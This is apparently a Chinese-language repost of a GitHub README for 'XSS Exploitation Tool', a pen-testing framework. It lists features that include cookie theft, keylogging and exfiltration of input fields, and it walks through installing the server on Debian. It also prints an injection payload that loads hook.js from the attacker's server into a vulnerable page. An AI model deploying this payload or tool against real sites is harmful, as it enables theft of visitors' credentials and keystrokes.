一款XSS利用工具
作者:Sec-Labs | 发布时间:
项目地址
https://github.com/Sharpforce/XSS-Exploitation-Tool
XSS Exploitation Tool
相关技术点
- XSS(Cross-Site Scripting)跨站脚本攻击漏洞
- Apache、MySQL、PHP等Web开发技术
- 前端JavaScript技术
项目用途
XSS Exploitation Tool是一个用于渗透测试的工具,专注于利用跨站脚本漏洞。其功能包括:
- 获取受害者浏览器的技术数据
- 获取受害者的地理位置
- 获取被钩住/访问的页面的快照
- 获取被钩住/访问的页面的源代码
- 泄露输入字段数据
- 泄露Cookie
- 键盘记录
- 显示警报框
- 重定向用户
使用方法:
- 创建一个页面或利用跨站脚本漏洞将JavaScript钩子文件插入页面。
- 受害者访问被钩住的页面,XSS Exploitation Tool服务器会列出被钩住的浏览器。
该工具仅用于教育目的,不要用于真实环境。
XSS 漏洞利用工具
XSS 漏洞利用工具是一款专注于利用跨站脚本漏洞的渗透测试工具。
该工具仅供教育目的,不要用于真实环境
特点
- 受害者浏览器的技术数据
- 受害者的地理位置
- 被钩住/访问页面的快照
- 被钩住/访问页面的源代码
- 泄露输入字段数据
- 泄露 cookies
- 按键记录
- 显示警报框
- 重定向用户
安装
在 Debian 11 上测试通过
您可能需要 Apache、MySQL 数据库和带有模块的 PHP:
$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html
安装 Git 并拉取 XSS-Exploitation-Tool 源代码:
$ sudo apt-get install git
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/
安装 composer,然后安装应用程序依赖项:
$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/
初始化数据库
$ sudo mysql
创建一个具有特定权限的新用户:
MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> quit
Bye
创建数据库(将导致一个空页面):
访问页面 http://server-ip/reset_database.php
调整 JavaScript 钩子文件
文件 hook.js 是一个钩子。您需要将第一行中的 IP 地址替换为 XSS 漏洞利用工具服务器的 IP 地址:
var address = "your server ip";
工作原理
首先,创建一个页面(或利用跨站脚本漏洞)来插入 JavaScript 钩子文件(请参见根目录下的 exploit.html):
?vulnerable_param=<script src="http://your_server_ip/hook.js"/>
然后,当受害者访问被钩住的页面时,XSS 漏洞利用工具服务器应该列出被钩住的浏览器:

屏幕截图


标签:工具分享, 渗透测试框架, 漏洞扫描器, XSS漏洞检测工具, xss攻击